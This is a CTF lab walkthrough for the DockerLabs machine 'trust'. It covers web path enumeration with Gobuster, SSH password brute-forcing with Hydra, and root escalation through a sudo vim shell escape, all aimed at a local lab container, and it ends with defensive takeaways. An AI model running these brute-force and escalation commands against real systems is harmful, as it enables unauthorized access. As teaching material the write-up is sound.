Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/V0rt3xS0urc3/RedTeam-Portfolio/llms.txt

Use this file to discover all available pages before exploring further.

trust is a Very Easy DockerLabs machine that chains three foundational techniques: web directory enumeration to discover a hidden PHP page leaking a username, SSH credential brute-forcing with Hydra to log in as that user, and a sudo vim misconfiguration to escalate directly to root. It is an excellent starter machine for practising the full end-to-end workflow — from passive web footprinting all the way to a root shell.
Machine Info
FieldDetails
DifficultyVery Easy (Muy Fácil / Súper Fácil)
CategoryHacking Infraestructura
OSLinux
Key TechniquesWeb enumeration, Gobuster, Hydra SSH brute force, sudo abuse (vim)
Default Target IP172.17.0.2

Phase 0: Launch Kali Portable

Open a second terminal and start your Kali Portable environment:
./run-kali.sh normal
All commands below run inside this session.

Phase 1: Deploy the Machine

Download trust.zip from DockerLabs. In your first terminal:
unzip trust.zip
chmod +x auto_deploy.sh
./auto_deploy.sh trust.tar
Two files are extracted:
  • auto_deploy.sh — Bash script that launches the container
  • trust.tar — The vulnerable Docker image

Phase 2: Reconnaissance

1

Ping Check

Verify connectivity to the container:
ping -c 3 172.17.0.2
2

Nmap Service Scan

Scan with version detection and default scripts:
nmap -sC -sV --min-rate 5000 172.17.0.2
ArgumentMeaning
-sCRuns default NSE scripts
-sVDetects service versions
--min-rate 5000Fast rate, suitable for isolated lab use
Findings:
PortServiceNotes
22/tcpSSHEncrypted remote access
80/tcpHTTPApache2 web server
Two services — a web server and SSH. The web server is the entry point.
Avoid --min-rate in real engagements. It is noisy and can trigger security controls. Use -T3 or slower with -sS for stealth.
3

Browse the Web Server

Open a browser and navigate to http://172.17.0.2. The page shows the default Apache2 Debian landing page — no custom content, no login form, nothing obviously useful. Move on to active enumeration.

Phase 3: Web Enumeration with Gobuster

The default Apache page is a dead end, but hidden files may exist beneath the surface. Use Gobuster to brute-force paths:
gobuster dir \
  -u http://172.17.0.2 \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -x .php,.txt,.html \
  -r \
  --exclude-length 10701 \
  -t 100
ArgumentMeaning
dirDirectory/file brute-force mode
-u http://172.17.0.2Target URL
-w common.txtSecLists common web paths wordlist
-x .php,.txt,.htmlAlso probe for these file extensions
-rFollow redirects automatically
--exclude-length 10701Filter out false positives with this response length (the Apache default page)
-t 100100 threads for fast enumeration
The --exclude-length 10701 flag is essential here. Without it, every 404-equivalent path returns the default Apache page with a 200 status code and a content length of 10701 bytes, which would flood the results with false positives. Identify the false-positive length from any non-existent path, then filter it out.
Finding — discovered in ~10 seconds:
/secret.php   (Status: 200)
Visit http://172.17.0.2/secret.php in your browser. The page displays a simple message:
Hola Mario
And a note claiming the web cannot be hacked. Ignore the taunt — the page has inadvertently revealed a username: mario.

Phase 4: SSH Brute Force with Hydra

With a username in hand, attempt SSH login. Entering ssh mario@172.17.0.2 and hitting enter confirms the username is accepted — the server responds with a password prompt rather than rejecting the user outright. Since this is a Very Easy machine, the password is likely near the top of rockyou.txt. Extract only the first 1000 most common passwords to speed up the attack significantly:
head -n 1000 /usr/share/wordlists/rockyou.txt > top1000.txt
Run Hydra against the extracted list:
hydra -l mario -P top1000.txt ssh://172.17.0.2 -t 4
ArgumentMeaning
-l marioKnown username
-P top1000.txtTrimmed password list (top 1000)
ssh://172.17.0.2Target
-t 44 threads
Result (found in ~24 seconds): The password is chocolate.
[22][ssh] host: 172.17.0.2   login: mario   password: chocolate

Phase 5: SSH Access

Log in with the discovered credentials:
ssh mario@172.17.0.2
# Password: chocolate
You are now inside the system as the user mario.

Phase 6: Privilege Escalation via Sudo + Vim

1

Enumerate Sudo Permissions

The first thing to check on any Linux box after gaining a shell is what sudo permissions the current user has:
sudo -l
Output:
User mario may run the following commands on trust:
    (ALL) /usr/bin/vim
The user mario can run vim as any user (including root) with sudo. This is a well-known privilege escalation path documented on GTFOBins.
2

Escalate to Root via Vim Shell

Use the GTFOBins sudo shell escape for vim — option sudo → Shell → a:
sudo vim -c ':!/bin/sh'
PartMeaning
sudo vimLaunches vim with root privileges
-c ':!/bin/sh'Passes a vim command that executes /bin/sh as a shell
Vim opens with root privileges and immediately drops you into an interactive /bin/sh shell running as root.
3

Verify Root Access

Confirm the escalation succeeded:
whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)
4

Capture the Flag

Read the root flag:
ls /root
cat /root/flag.txt
GTFOBins (gtfobins.github.io) is an indispensable reference for privilege escalation via sudo and SUID binary abuse. Any time sudo -l reveals a command you can run as root, look it up on GTFOBins immediately — many editors, scripting languages, and utilities have documented shell escape techniques.

Post-Lab Cleanup

Press Ctrl+C in the deploy terminal to stop the container. Type exit to leave your Kali Portable session.

Key Takeaways

Never Expose Information in Web Pages

The secret.php page handed us a valid username — the pivotal piece of information needed to attack SSH. Even innocuous-looking pages can leak critical data. Avoid displaying usernames, email addresses, or system names in web responses.

Targeted Wordlists Save Time

Instead of running the full rockyou.txt (14 million entries), using the top 1000 reduced the brute-force time from potentially hours to under 30 seconds. Tailor your wordlist to the context: Very Easy machines almost always use common passwords.

sudo Editor Access = Root Access

Allowing sudo on text editors (vim, nano, less, more) is functionally the same as granting a root shell. If a user needs to edit a specific config file as root, use sudoedit with a path restriction instead of granting full editor access.

GTFOBins Is Your Friend

GTFOBins catalogs shell escape techniques for dozens of binaries. During any CTF or engagement, if sudo -l returns an editor, compiler, interpreter, or file manager — GTFOBins likely has a working escalation path ready to use.

Build docs developers (and LLMs) love